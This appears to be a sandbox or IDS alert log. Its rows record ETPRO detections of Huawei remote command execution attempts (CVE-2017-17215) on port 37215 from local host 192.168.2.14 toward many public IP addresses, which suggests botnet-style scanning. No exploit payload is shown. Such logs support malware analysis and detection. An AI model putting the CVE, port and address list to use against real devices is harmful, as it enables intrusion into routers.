                                                    07/10/24-08:27:07.384397TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5609437215192.168.2.1441.135.113.149
                                                    07/10/24-08:26:25.473700TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4040637215192.168.2.14167.161.92.187
                                                    07/10/24-08:27:02.986988TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5587437215192.168.2.14188.83.196.154
                                                    07/10/24-08:27:32.545820TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6033637215192.168.2.14166.48.25.131
                                                    07/10/24-08:26:14.824786TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5724037215192.168.2.14157.217.221.4
                                                    07/10/24-08:26:55.289517TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5346637215192.168.2.14197.117.201.224
                                                    07/10/24-08:26:13.759189TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4396437215192.168.2.14157.204.28.132
                                                    07/10/24-08:26:38.594739TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4324437215192.168.2.1441.220.142.220
                                                    07/10/24-08:26:59.842336TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5583237215192.168.2.14197.156.17.82
                                                    07/10/24-08:27:30.444782TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4135837215192.168.2.14108.65.105.59
                                                    07/10/24-08:27:23.822671TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5680437215192.168.2.14157.113.11.153
                                                    07/10/24-08:26:25.499192TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4810837215192.168.2.1441.45.14.248
                                                    07/10/24-08:27:13.980831TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5712437215192.168.2.14197.178.212.190
                                                    07/10/24-08:26:49.764641TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4787037215192.168.2.1439.214.1.102
                                                    07/10/24-08:27:17.048975TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5643037215192.168.2.14197.73.55.139
                                                    07/10/24-08:26:20.189535TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4191437215192.168.2.1480.53.145.190
                                                    07/10/24-08:26:28.901857TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4811037215192.168.2.1441.250.33.117
                                                    07/10/24-08:26:28.647124TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4544837215192.168.2.14157.242.231.198
                                                    07/10/24-08:27:33.825878TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5272037215192.168.2.14197.193.180.17
                                                    07/10/24-08:26:41.365673TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4004037215192.168.2.14112.93.70.213
                                                    07/10/24-08:26:57.522324TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5300437215192.168.2.1441.196.86.250
                                                    07/10/24-08:26:34.229279TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5253837215192.168.2.14213.105.60.186
                                                    07/10/24-08:26:49.810296TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5709637215192.168.2.14157.108.124.186
                                                    07/10/24-08:27:33.845766TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3497237215192.168.2.1441.57.224.136
                                                    07/10/24-08:26:34.260009TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5951837215192.168.2.14157.208.212.147
                                                    07/10/24-08:26:55.296464TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4901237215192.168.2.14197.238.236.252
                                                    07/10/24-08:27:31.553494TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4086437215192.168.2.1481.241.230.86
                                                    07/10/24-08:26:20.178441TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4317837215192.168.2.14157.112.229.220
                                                    07/10/24-08:26:47.773656TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5361837215192.168.2.144.178.184.172
                                                    07/10/24-08:27:02.994368TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4098237215192.168.2.1441.176.22.15
                                                    07/10/24-08:27:13.967475TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4925837215192.168.2.14197.105.91.138
                                                    07/10/24-08:27:22.872450TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4955037215192.168.2.14157.102.52.224
                                                    07/10/24-08:27:10.712804TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4254437215192.168.2.14157.39.8.6
                                                    07/10/24-08:27:22.890637TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5451837215192.168.2.14197.13.178.132
                                                    07/10/24-08:27:33.764510TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3953237215192.168.2.14157.82.234.29
                                                    07/10/24-08:26:43.875784TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5311037215192.168.2.14197.43.249.124
                                                    07/10/24-08:26:43.843292TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5088037215192.168.2.14162.49.181.60
                                                    07/10/24-08:27:13.964289TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4405437215192.168.2.1474.154.50.44
                                                    07/10/24-08:26:59.882583TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5433037215192.168.2.1441.50.229.62
                                                    07/10/24-08:27:27.147329TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3575437215192.168.2.14197.130.102.70
                                                    07/10/24-08:26:11.149961TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4751237215192.168.2.1495.129.116.158
                                                    07/10/24-08:26:52.054168TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5216037215192.168.2.1479.221.110.16
                                                    07/10/24-08:26:42.432411TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4473037215192.168.2.14157.19.223.198
                                                    07/10/24-08:26:20.175681TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5519437215192.168.2.14197.165.148.213
                                                    07/10/24-08:27:23.505996TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4492637215192.168.2.1441.15.229.42
                                                    07/10/24-08:27:17.044301TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5396237215192.168.2.1441.55.163.150
                                                    07/10/24-08:26:20.157992TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3881237215192.168.2.1441.232.254.127
                                                    07/10/24-08:27:10.638675TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4987837215192.168.2.14157.16.204.60
                                                    07/10/24-08:26:43.540694TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4222837215192.168.2.14157.37.210.93
                                                    07/10/24-08:27:13.804440TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5703037215192.168.2.14197.29.162.250
                                                    07/10/24-08:26:43.842047TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3741437215192.168.2.14197.79.138.13
                                                    07/10/24-08:26:25.525521TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3785837215192.168.2.1439.195.59.35
                                                    07/10/24-08:27:13.911358TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3641037215192.168.2.1445.32.91.193
                                                    07/10/24-08:27:14.829159TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5276637215192.168.2.14157.233.72.46
                                                    07/10/24-08:26:41.391296TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5215637215192.168.2.14197.85.174.67
                                                    07/10/24-08:27:28.165793TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5826437215192.168.2.14157.19.92.114
                                                    07/10/24-08:26:23.351340TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3722837215192.168.2.14157.149.20.109
                                                    07/10/24-08:26:28.798485TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3894037215192.168.2.14197.0.220.127
                                                    07/10/24-08:26:45.646162TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3287637215192.168.2.1441.201.133.131
                                                    07/10/24-08:26:43.782105TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5019637215192.168.2.1441.60.148.72
                                                    07/10/24-08:26:31.046551TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3323637215192.168.2.14129.191.9.211
                                                    07/10/24-08:26:11.115626TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5743237215192.168.2.1441.189.159.169
                                                    07/10/24-08:26:20.160922TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3420637215192.168.2.1441.190.180.95
                                                    07/10/24-08:26:29.757502TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6008037215192.168.2.14197.64.17.244
                                                    07/10/24-08:27:28.147073TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3496237215192.168.2.1452.28.156.108
                                                    07/10/24-08:26:49.904329TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3981637215192.168.2.1441.157.223.252
                                                    07/10/24-08:27:22.781993TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6040837215192.168.2.14212.209.85.33
                                                    07/10/24-08:26:11.583126TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3393237215192.168.2.14157.176.51.125
                                                    07/10/24-08:26:53.124303TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3579237215192.168.2.14197.71.159.17
                                                    07/10/24-08:26:49.805263TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3926437215192.168.2.14179.121.7.49
                                                    07/10/24-08:26:18.029316TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5328237215192.168.2.14206.88.145.99
                                                    07/10/24-08:26:41.462014TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4483437215192.168.2.1418.115.121.66
                                                    07/10/24-08:26:29.794117TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4042037215192.168.2.14197.227.190.140
                                                    07/10/24-08:26:57.505236TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3531237215192.168.2.1441.229.249.194
                                                    07/10/24-08:27:22.848965TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3992237215192.168.2.14197.58.108.85
                                                    07/10/24-08:26:36.416041TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4145637215192.168.2.14157.53.7.108
                                                    07/10/24-08:26:26.600322TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5767637215192.168.2.14197.219.41.185
                                                    07/10/24-08:27:08.318439TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4805637215192.168.2.14157.193.118.174
                                                    07/10/24-08:26:45.647215TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5339637215192.168.2.1441.150.76.128
                                                    07/10/24-08:26:59.863856TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5021437215192.168.2.14157.103.54.95
                                                    07/10/24-08:27:20.483552TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4487637215192.168.2.1493.210.71.59
                                                    07/10/24-08:26:43.554378TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4166037215192.168.2.14129.112.163.212
                                                    07/10/24-08:27:23.965193TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3765037215192.168.2.14157.21.89.42
                                                    07/10/24-08:27:27.100139TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6008437215192.168.2.14157.192.211.136
                                                    07/10/24-08:26:14.748611TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6002237215192.168.2.1441.174.91.155
                                                    07/10/24-08:26:17.951496TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5469637215192.168.2.14197.67.12.234
                                                    07/10/24-08:26:55.385605TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5225037215192.168.2.14157.112.33.15
                                                    07/10/24-08:27:02.872706TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5788437215192.168.2.14194.187.148.97
                                                    07/10/24-08:27:14.665617TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5800837215192.168.2.14113.15.117.221
                                                    07/10/24-08:26:45.643057TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3641437215192.168.2.14197.145.210.218
                                                    07/10/24-08:26:22.222515TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4677837215192.168.2.14157.91.170.187
                                                    07/10/24-08:26:55.408292TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5568237215192.168.2.1432.42.134.167
                                                    07/10/24-08:27:13.891994TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5953237215192.168.2.1441.75.165.39
                                                    07/10/24-08:27:22.873299TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3805837215192.168.2.14176.104.164.27
                                                    07/10/24-08:26:29.880406TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5783437215192.168.2.14157.214.214.228
                                                    07/10/24-08:27:08.398015TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4643037215192.168.2.14197.19.84.165
                                                    07/10/24-08:26:29.860242TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5003437215192.168.2.14197.125.74.194
                                                    07/10/24-08:26:59.814735TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3306837215192.168.2.14197.40.7.167
                                                    07/10/24-08:26:42.388281TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3868037215192.168.2.14197.71.53.200
                                                    07/10/24-08:26:48.708629TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3511637215192.168.2.14197.217.183.84
                                                    07/10/24-08:26:28.866778TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5873237215192.168.2.14172.238.18.26
                                                    07/10/24-08:26:34.212749TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4672837215192.168.2.14200.253.44.165
                                                    07/10/24-08:26:29.794117TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5858837215192.168.2.14197.207.227.75
                                                    07/10/24-08:27:14.853963TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5469837215192.168.2.14197.103.15.202
                                                    07/10/24-08:27:33.980422TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3478837215192.168.2.14192.191.239.26
                                                    07/10/24-08:26:28.924774TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4385837215192.168.2.14197.253.51.161
                                                    07/10/24-08:26:15.820169TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5331437215192.168.2.14157.8.84.203
                                                    07/10/24-08:27:30.444782TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5112437215192.168.2.14157.198.224.15
                                                    07/10/24-08:26:23.279248TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4600237215192.168.2.14105.228.234.84
                                                    07/10/24-08:26:36.322719TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4813437215192.168.2.1441.46.28.159
                                                    07/10/24-08:27:33.852239TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5118437215192.168.2.14197.153.9.193
                                                    07/10/24-08:27:22.926271TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4434037215192.168.2.14157.70.197.101
                                                    07/10/24-08:27:32.622177TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5861437215192.168.2.14157.226.17.22
                                                    07/10/24-08:26:34.236925TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4470437215192.168.2.1447.140.183.33
                                                    07/10/24-08:26:31.110182TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4309437215192.168.2.14157.141.134.73
                                                    07/10/24-08:26:11.588620TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3469837215192.168.2.1490.185.86.151
                                                    07/10/24-08:26:18.006085TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3774637215192.168.2.1441.239.74.122
                                                    07/10/24-08:27:17.077286TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4347637215192.168.2.14197.201.131.48
                                                    07/10/24-08:27:28.134623TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5241837215192.168.2.1480.87.68.206
                                                    07/10/24-08:26:52.022407TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5633437215192.168.2.14157.11.84.198
                                                    07/10/24-08:27:07.349676TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4190437215192.168.2.14197.20.251.41
                                                    07/10/24-08:26:18.008583TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4733437215192.168.2.1445.148.71.173
                                                    07/10/24-08:27:14.885760TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3280637215192.168.2.1441.178.173.48
                                                    07/10/24-08:26:41.499306TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5635037215192.168.2.14197.202.226.9
                                                    07/10/24-08:27:13.942204TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5742437215192.168.2.1441.123.234.195
                                                    07/10/24-08:26:20.098381TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4386837215192.168.2.14157.245.72.235
                                                    07/10/24-08:26:22.234679TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5366837215192.168.2.1441.75.101.180
                                                    07/10/24-08:26:31.063157TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4836037215192.168.2.14157.133.101.228
                                                    07/10/24-08:27:14.837323TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4986437215192.168.2.14157.204.184.122
                                                    07/10/24-08:27:19.340130TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4850037215192.168.2.14180.27.67.140
                                                    07/10/24-08:26:11.176573TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3370037215192.168.2.1483.156.17.59
                                                    07/10/24-08:26:25.445114TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4249437215192.168.2.14197.217.222.61
                                                    07/10/24-08:26:57.513977TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4349237215192.168.2.1441.41.2.157
                                                    07/10/24-08:26:59.627157TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5555237215192.168.2.1441.99.97.92
                                                    07/10/24-08:26:25.464984TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5682237215192.168.2.1441.83.130.224
                                                    07/10/24-08:26:26.594913TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5821437215192.168.2.14157.113.156.32
                                                    07/10/24-08:26:28.900792TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5799037215192.168.2.148.145.242.31
                                                    07/10/24-08:27:33.723492TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5844037215192.168.2.14177.133.235.21
                                                    07/10/24-08:27:22.784576TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4154237215192.168.2.1441.15.139.250
                                                    07/10/24-08:26:41.486233TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3903837215192.168.2.1441.162.90.166
                                                    07/10/24-08:27:02.716869TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3921237215192.168.2.1441.98.69.161
                                                    07/10/24-08:27:23.912574TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5487437215192.168.2.14197.152.218.26
                                                    07/10/24-08:26:29.849427TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5147437215192.168.2.14157.38.228.6
                                                    07/10/24-08:26:57.627051TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5868437215192.168.2.1441.19.228.72
                                                    07/10/24-08:26:41.521223TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3465637215192.168.2.1443.27.1.254
                                                    07/10/24-08:27:13.970861TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5868237215192.168.2.14157.14.246.250
                                                    07/10/24-08:26:57.680054TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3602237215192.168.2.14157.7.4.219
                                                    07/10/24-08:27:17.070374TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4844637215192.168.2.14197.141.103.167
                                                    07/10/24-08:27:30.423823TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6087837215192.168.2.14197.228.167.117
                                                    07/10/24-08:27:03.003897TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5894637215192.168.2.14157.161.236.90
                                                    07/10/24-08:27:19.164570TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5396637215192.168.2.14114.19.111.231
                                                    07/10/24-08:27:10.679759TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4975437215192.168.2.1441.121.4.136
                                                    07/10/24-08:26:41.395852TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5800837215192.168.2.1441.34.70.63
                                                    07/10/24-08:26:13.824785TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5771037215192.168.2.14157.190.3.221
                                                    07/10/24-08:27:13.815715TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5983837215192.168.2.14188.38.107.17
                                                    07/10/24-08:26:55.422877TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6059437215192.168.2.14124.246.206.28
                                                    07/10/24-08:27:20.476215TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5934237215192.168.2.1441.216.225.143
                                                    07/10/24-08:27:14.839974TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5014237215192.168.2.14178.94.38.118
                                                    07/10/24-08:26:55.428657TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5420437215192.168.2.14132.55.77.140
                                                    07/10/24-08:27:33.946860TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6018037215192.168.2.14197.11.110.251
                                                    07/10/24-08:26:38.542118TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4213637215192.168.2.1441.16.134.250
                                                    07/10/24-08:27:33.942664TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3506437215192.168.2.14197.53.91.127
                                                    07/10/24-08:26:51.983078TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4312637215192.168.2.1441.20.132.240
                                                    07/10/24-08:26:59.642671TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5642637215192.168.2.1441.215.197.203
                                                    07/10/24-08:27:22.784576TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4241437215192.168.2.14157.67.156.63
                                                    07/10/24-08:26:43.872664TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5364237215192.168.2.1441.89.158.39
                                                    07/10/24-08:27:23.959753TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5331037215192.168.2.14172.88.141.46
                                                    07/10/24-08:27:30.472890TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3457237215192.168.2.1441.225.213.48
                                                    07/10/24-08:27:27.159705TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6065037215192.168.2.14157.50.30.78
                                                    07/10/24-08:27:31.435309TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3318237215192.168.2.14157.164.31.190
                                                    07/10/24-08:26:17.941159TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5496437215192.168.2.14157.241.212.174
                                                    07/10/24-08:26:20.098304TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5614037215192.168.2.14197.252.103.164
                                                    07/10/24-08:26:36.435588TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3892037215192.168.2.1441.22.158.171
                                                    07/10/24-08:26:47.981367TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4652837215192.168.2.14157.230.40.98
                                                    07/10/24-08:27:31.553494TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3404637215192.168.2.14197.193.7.45
                                                    07/10/24-08:27:36.283818TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3671437215192.168.2.14159.120.3.20
                                                    07/10/24-08:27:05.132533TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4741237215192.168.2.1441.233.222.85
                                                    07/10/24-08:27:14.675779TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4384837215192.168.2.14157.33.22.177
                                                    07/10/24-08:27:17.064764TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5175437215192.168.2.14197.170.232.181
                                                    07/10/24-08:26:42.393770TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4421437215192.168.2.14157.65.56.156
                                                    07/10/24-08:26:22.240968TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4169837215192.168.2.1478.78.244.138
                                                    07/10/24-08:26:52.012219TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4529637215192.168.2.1441.158.13.173
                                                    07/10/24-08:27:08.393293TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3766237215192.168.2.14197.39.171.3
                                                    07/10/24-08:27:27.174568TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4261037215192.168.2.1441.110.136.191
                                                    07/10/24-08:26:25.479455TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5929637215192.168.2.14119.26.197.79
